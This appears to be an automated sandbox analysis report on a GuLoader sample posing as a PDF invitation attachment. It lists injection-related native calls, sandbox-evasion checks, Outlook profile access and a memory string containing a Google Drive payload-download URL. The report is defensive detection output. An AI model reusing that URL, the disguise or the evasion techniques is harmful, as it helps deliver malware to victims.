Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7F5B	0_2_020A7F5B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AEF6B	0_2_020AEF6B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADF8B	0_2_020ADF8B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADFC3	0_2_020ADFC3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9C0F	0_2_020A9C0F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7C2F	0_2_020A7C2F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A6C4E	0_2_020A6C4E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9C83	0_2_020A9C83
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7C9B	0_2_020A7C9B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADCE3	0_2_020ADCE3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9D07	0_2_020A9D07
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7D13	0_2_020A7D13
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADD17	0_2_020ADD17
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADD6F	0_2_020ADD6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7D73	0_2_020A7D73
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9D74	0_2_020A9D74
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADDDB	0_2_020ADDDB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7DEB	0_2_020A7DEB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9DE7	0_2_020A9DE7

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A942C NtAllocateVirtualMemory,	0_2_020A942C
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADAD0 NtWriteVirtualMemory,	0_2_020ADAD0
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE9C2 NtProtectVirtualMemory,	0_2_020AE9C2
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A820F NtWriteVirtualMemory,	0_2_020A820F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A826F NtWriteVirtualMemory,	0_2_020A826F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A82FB NtWriteVirtualMemory,	0_2_020A82FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A835F NtWriteVirtualMemory,	0_2_020A835F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A4364 NtWriteVirtualMemory,	0_2_020A4364
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A83CB NtWriteVirtualMemory,	0_2_020A83CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD02E NtWriteVirtualMemory,	0_2_020AD02E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8067 NtWriteVirtualMemory,	0_2_020A8067
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A70A8 NtWriteVirtualMemory,	0_2_020A70A8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A80BB NtWriteVirtualMemory,	0_2_020A80BB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8130 NtWriteVirtualMemory,	0_2_020A8130
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A81BB NtWriteVirtualMemory,	0_2_020A81BB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A961B NtAllocateVirtualMemory,	0_2_020A961B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9635 NtAllocateVirtualMemory,	0_2_020A9635
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7643 NtWriteVirtualMemory,	0_2_020A7643
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AB645 NtWriteVirtualMemory,	0_2_020AB645
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8663 NtWriteVirtualMemory,	0_2_020A8663
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A76B3 NtWriteVirtualMemory,	0_2_020A76B3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A96CB NtAllocateVirtualMemory,	0_2_020A96CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A86E3 NtWriteVirtualMemory,	0_2_020A86E3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7723 NtWriteVirtualMemory,	0_2_020A7723
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9747 NtAllocateVirtualMemory,	0_2_020A9747
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8753 NtWriteVirtualMemory,	0_2_020A8753
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A77B8 NtWriteVirtualMemory,	0_2_020A77B8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AF7D5 NtWriteVirtualMemory,	0_2_020AF7D5
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A945F NtAllocateVirtualMemory,	0_2_020A945F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8463 NtWriteVirtualMemory,	0_2_020A8463
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A0494 NtWriteVirtualMemory,LoadLibraryA,	0_2_020A0494
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A94C3 NtAllocateVirtualMemory,	0_2_020A94C3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A84FB NtWriteVirtualMemory,	0_2_020A84FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9523 NtAllocateVirtualMemory,	0_2_020A9523
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8547 NtWriteVirtualMemory,	0_2_020A8547
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7552 NtWriteVirtualMemory,	0_2_020A7552
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9593 NtAllocateVirtualMemory,	0_2_020A9593
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A95BD NtAllocateVirtualMemory,	0_2_020A95BD
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A85CB NtWriteVirtualMemory,	0_2_020A85CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7A6F NtWriteVirtualMemory,	0_2_020A7A6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AEA7F NtProtectVirtualMemory,	0_2_020AEA7F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7AE7 NtWriteVirtualMemory,	0_2_020A7AE7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7BA3 NtWriteVirtualMemory,	0_2_020A7BA3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7807 NtWriteVirtualMemory,	0_2_020A7807
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A788B NtWriteVirtualMemory,	0_2_020A788B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A790F NtWriteVirtualMemory,	0_2_020A790F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A796E NtWriteVirtualMemory,	0_2_020A796E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7963 NtWriteVirtualMemory,	0_2_020A7963
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7974 NtWriteVirtualMemory,	0_2_020A7974
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A79FB NtWriteVirtualMemory,	0_2_020A79FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AEE11 NtProtectVirtualMemory,	0_2_020AEE11
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7E6F NtWriteVirtualMemory,	0_2_020A7E6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7EE3 NtWriteVirtualMemory,	0_2_020A7EE3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7F5B NtWriteVirtualMemory,	0_2_020A7F5B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7C2F NtWriteVirtualMemory,	0_2_020A7C2F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7C9B NtWriteVirtualMemory,	0_2_020A7C9B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7D13 NtWriteVirtualMemory,	0_2_020A7D13
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7D73 NtWriteVirtualMemory,	0_2_020A7D73
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7DEB NtWriteVirtualMemory,	0_2_020A7DEB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FBF7 LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FBF7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FD81 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FD81
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FE33 NtProtectVirtualMemory,	13_2_0056FE33
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FC2B LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FC2B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FBF1 LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FBF1
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FB82 LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FB82
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FBAF LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FBAF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FCAF NtProtectVirtualMemory,	13_2_0056FCAF

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Process Stats: CPU usage > 98%

Sample file is different than original file name gathered from version info

Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.338762831.000000000041C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339931590.0000000002A90000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameForm_reduc.exeFE2X vs Anexo I e II do convite#U00b7pdf.exe
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000000.336777031.000000000041C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe
Source: Anexo I e II do convite#U00b7pdf.exe	Binary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe

PE file contains strange resources

Source: Anexo I e II do convite#U00b7pdf.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

PE / OLE file has an invalid certificate

Source: Anexo I e II do convite#U00b7pdf.exe

Static PE information: invalid certificate

Source: Anexo I e II do convite#U00b7pdf.exe

Virustotal: Detection: 29%

Source: Anexo I e II do convite#U00b7pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match	File source: 0000000D.00000000.338047511.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402640 push 0040130Eh; ret	0_2_00402653
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402654 push 0040130Eh; ret	0_2_00402667
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402668 push 0040130Eh; ret	0_2_0040267B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040267C push 0040130Eh; ret	0_2_0040268F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402604 push 0040130Eh; ret	0_2_00402617
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402618 push 0040130Eh; ret	0_2_0040262B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040262C push 0040130Eh; ret	0_2_0040263F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_004026CC push 0040130Eh; ret	0_2_004026DF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_004026E0 push 0040130Eh; ret	0_2_004026F3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_004026F4 push 0040130Eh; ret	0_2_00402707
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402690 push 0040130Eh; ret	0_2_004026A3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_004026A4 push 0040130Eh; ret	0_2_004026B7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_004026B8 push 0040130Eh; ret	0_2_004026CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402744 push 0040130Eh; ret	0_2_00402757
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402758 push 0040130Eh; ret	0_2_0040276B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00404B67 push ds; ret	0_2_00404B68
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040276C push 0040130Eh; ret	0_2_0040277F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00403D73 push esp; iretd	0_2_00403D74
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402708 push 0040130Eh; ret	0_2_0040271B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040271C push 0040130Eh; ret	0_2_0040272F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040231C push 0040130Eh; ret	0_2_00402603
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00406F2A push ecx; retf	0_2_00406F3D
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402730 push 0040130Eh; ret	0_2_00402743
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402780 push 0040130Eh; ret	0_2_00402793
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040618C push 10768459h; retf	0_2_00406191
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402794 push 0040130Eh; ret	0_2_004027A7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A942C push C30B40E8h; retf 5D80h	0_2_020A991E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A313B push cs; retf	0_2_020A313C
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A961B push C30B40E8h; retf 5D80h	0_2_020A991E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9635 push C30B40E8h; retf 5D80h	0_2_020A991E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A4640 push FFFFFF81h; ret	0_2_020A4642

Persistence and Installation Behavior:

Creates processes with suspicious names

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File created: \anexo i e ii do convite#u00b7pdf.exe
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File created: \anexo i e ii do convite#u00b7pdf.exe			Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1WOW1V-FWJJB6G5MIGMHVWOYYWXRCNCHQ
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp, Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000002.419267340.0000000000810000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339411798.0000000002870000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe TID: 6136	Thread sleep count: 527 > 30			Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe TID: 6988	Thread sleep time: -60000s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Last function: Thread delayed

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Code function: 0_2_020ACEC8 rdtsc

0_2_020ACEC8

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Window / User API: threadDelayed 527

Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

